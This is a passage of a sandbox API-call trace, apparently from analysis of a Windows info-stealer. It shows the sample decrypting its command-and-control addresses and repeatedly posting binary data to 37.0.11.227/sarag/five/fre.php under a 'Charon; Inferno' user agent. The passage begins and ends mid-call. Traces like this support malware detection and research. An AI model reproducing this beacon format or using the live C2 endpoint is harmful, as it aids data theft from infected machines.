Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0339.922] GetProcessHeap () returned 0x690000 [0339.922] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6b0340 [0339.922] GetProcessHeap () returned 0x690000 [0339.922] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0339.923] GetProcessHeap () returned 0x690000 [0339.923] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a3fe0 [0339.923] GetProcessHeap () returned 0x690000 [0339.923] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cd7d8 [0339.925] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0339.931] wvsprintfA (in: param_1=0x6cd7d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0339.931] GetProcessHeap () returned 0x690000 [0339.931] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0339.931] GetProcessHeap () returned 0x690000 [0339.932] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0339.932] send (s=0xc34, buf=0x6ad508*, len=242, flags=0) returned 242 [0339.933] send (s=0xc34, buf=0x6aba40*, len=159, flags=0) returned 159 [0339.933] GetProcessHeap () returned 0x690000 [0339.933] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0339.933] recv (in: s=0xc34, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0340.021] GetProcessHeap () returned 0x690000 [0340.021] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0340.021] GetProcessHeap () returned 0x690000 [0340.022] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0340.022] GetProcessHeap () returned 0x690000 [0340.022] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b0340 | out: hHeap=0x690000) returned 1 [0340.022] GetProcessHeap () returned 0x690000 [0340.023] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeff0 | out: hHeap=0x690000) returned 1 [0340.023] closesocket (s=0xc34) returned 0 [0340.023] GetProcessHeap () returned 0x690000 [0340.023] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3b0 | out: hHeap=0x690000) returned 1 [0340.023] GetProcessHeap () returned 0x690000 [0340.024] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0340.040] GetProcessHeap () returned 0x690000 [0340.040] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0340.041] GetProcessHeap () returned 0x690000 [0340.041] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0340.052] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1984) returned 0xc34 [0340.054] Sleep (dwMilliseconds=0xea60) [0340.059] GetProcessHeap () returned 0x690000 [0340.059] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0340.059] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0340.060] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0340.066] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0340.066] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aef68) returned 1 [0340.075] GetProcessHeap () returned 0x690000 [0340.075] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0340.076] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0340.076] CryptImportKey (in: hProv=0x6aef68, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d028) returned 1 [0340.077] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0340.077] CryptSetKeyParam (hKey=0x69d028, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0340.077] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0340.078] CryptSetKeyParam (hKey=0x69d028, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0340.078] GetProcessHeap () returned 0x690000 [0340.078] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0340.084] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0340.084] CryptDecrypt (in: hKey=0x69d028, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0340.084] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0340.085] CryptDestroyKey (hKey=0x69d028) returned 1 [0340.085] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0340.086] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0340.086] GetProcessHeap () returned 0x690000 [0340.086] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0340.086] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0340.087] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0340.087] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0340.087] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0340.088] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0340.088] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0340.089] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0340.089] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0340.089] GetProcessHeap () returned 0x690000 [0340.089] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0340.097] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0340.098] GetProcessHeap () returned 0x690000 [0340.098] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0340.098] GetProcessHeap () returned 0x690000 [0340.098] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0340.102] GetProcessHeap () returned 0x690000 [0340.102] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0340.102] GetProcessHeap () returned 0x690000 [0340.102] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0340.104] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0340.104] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0340.113] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0340.114] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0340.124] GetProcessHeap () returned 0x690000 [0340.124] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8970 [0340.125] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0340.125] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8970, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0340.126] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0340.126] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0340.127] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0340.128] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0340.128] GetProcessHeap () returned 0x690000 [0340.128] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8970 | out: hHeap=0x690000) returned 1 [0340.129] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0340.129] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0340.130] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0340.130] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0340.131] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0340.131] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0340.131] GetProcessHeap () returned 0x690000 [0340.131] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0340.132] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0340.132] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0340.133] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0340.134] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0340.134] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0340.135] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0340.135] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0340.136] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0340.136] GetProcessHeap () returned 0x690000 [0340.136] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0340.136] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0340.136] GetProcessHeap () returned 0x690000 [0340.136] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab400 [0340.136] socket (af=2, type=1, protocol=6) returned 0xc38 [0340.136] connect (s=0xc38, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0340.165] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0340.165] GetProcessHeap () returned 0x690000 [0340.165] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6af100 [0340.165] GetProcessHeap () returned 0x690000 [0340.165] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cd7d8 [0340.166] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0340.167] wvsprintfA (in: param_1=0x6cd7d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0340.167] GetProcessHeap () returned 0x690000 [0340.167] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af740 [0340.167] GetProcessHeap () returned 0x690000 [0340.167] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0340.168] GetProcessHeap () returned 0x690000 [0340.168] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4340 [0340.168] GetProcessHeap () returned 0x690000 [0340.168] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cd7d8 [0340.168] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0340.169] wvsprintfA (in: param_1=0x6cd7d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0340.169] GetProcessHeap () returned 0x690000 [0340.170] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0340.170] GetProcessHeap () returned 0x690000 [0340.170] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0340.170] send (s=0xc38, buf=0x6ad508*, len=242, flags=0) returned 242 [0340.171] send (s=0xc38, buf=0x6aba40*, len=159, flags=0) returned 159 [0340.171] GetProcessHeap () returned 0x690000 [0340.171] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0340.171] recv (in: s=0xc38, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0340.244] GetProcessHeap () returned 0x690000 [0340.244] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0340.244] GetProcessHeap () returned 0x690000 [0340.245] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0340.245] GetProcessHeap () returned 0x690000 [0340.245] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af740 | out: hHeap=0x690000) returned 1 [0340.246] GetProcessHeap () returned 0x690000 [0340.246] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af100 | out: hHeap=0x690000) returned 1 [0340.246] closesocket (s=0xc38) returned 0 [0340.247] GetProcessHeap () returned 0x690000 [0340.247] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab400 | out: hHeap=0x690000) returned 1 [0340.247] GetProcessHeap () returned 0x690000 [0340.247] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0340.247] GetProcessHeap () returned 0x690000 [0340.248] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0340.248] GetProcessHeap () returned 0x690000 [0340.248] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0340.249] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1988) returned 0xc38 [0340.251] Sleep (dwMilliseconds=0xea60) [0340.252] GetProcessHeap () returned 0x690000 [0340.252] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0340.253] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0340.254] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0340.260] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0340.260] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aef68) returned 1 [0340.271] GetProcessHeap () returned 0x690000 [0340.271] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0340.272] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0340.272] CryptImportKey (in: hProv=0x6aef68, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0340.276] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0340.276] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0340.281] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0340.282] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0340.282] GetProcessHeap () returned 0x690000 [0340.282] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0340.283] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0340.283] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0340.284] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0340.284] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0340.285] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0340.286] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0340.286] GetProcessHeap () returned 0x690000 [0340.286] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0340.286] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0340.287] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0340.295] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0340.295] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0340.300] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0340.301] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0340.301] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0340.302] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0340.305] GetProcessHeap () returned 0x690000 [0340.305] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0340.306] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0340.306] GetProcessHeap () returned 0x690000 [0340.307] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0340.309] GetProcessHeap () returned 0x690000 [0340.309] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0340.309] GetProcessHeap () returned 0x690000 [0340.310] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0340.310] GetProcessHeap () returned 0x690000 [0340.310] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0340.312] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0340.313] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0340.326] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0340.327] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0340.335] GetProcessHeap () returned 0x690000 [0340.335] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8940 [0340.335] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0340.336] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8940, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0340.336] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0340.336] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0340.337] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0340.337] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0340.338] GetProcessHeap () returned 0x690000 [0340.338] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8940 | out: hHeap=0x690000) returned 1 [0340.339] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0340.339] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0340.342] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0340.343] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0340.344] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0340.344] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0340.344] GetProcessHeap () returned 0x690000 [0340.344] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0340.345] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0340.345] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0340.346] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0340.347] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0340.348] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0340.348] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0340.349] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0340.350] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0340.350] GetProcessHeap () returned 0x690000 [0340.350] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0340.350] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0340.350] GetProcessHeap () returned 0x690000 [0340.350] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab410 [0340.350] socket (af=2, type=1, protocol=6) returned 0xc3c [0340.350] connect (s=0xc3c, name=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0340.379] FreeAddrInfoW (pAddrInfo=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0340.379] GetProcessHeap () returned 0x690000 [0340.379] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aee58 [0340.379] GetProcessHeap () returned 0x690000 [0340.379] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cd7d8 [0340.380] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0340.381] wvsprintfA (in: param_1=0x6cd7d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0340.381] GetProcessHeap () returned 0x690000 [0340.381] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6b0100 [0340.381] GetProcessHeap () returned 0x690000 [0340.381] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0340.381] GetProcessHeap () returned 0x690000 [0340.381] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4148 [0340.381] GetProcessHeap () returned 0x690000 [0340.381] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cd7d8 [0340.382] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0340.383] wvsprintfA (in: param_1=0x6cd7d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0340.383] GetProcessHeap () returned 0x690000 [0340.383] RtlAllocateHeap (HeapHandle=0x690000, 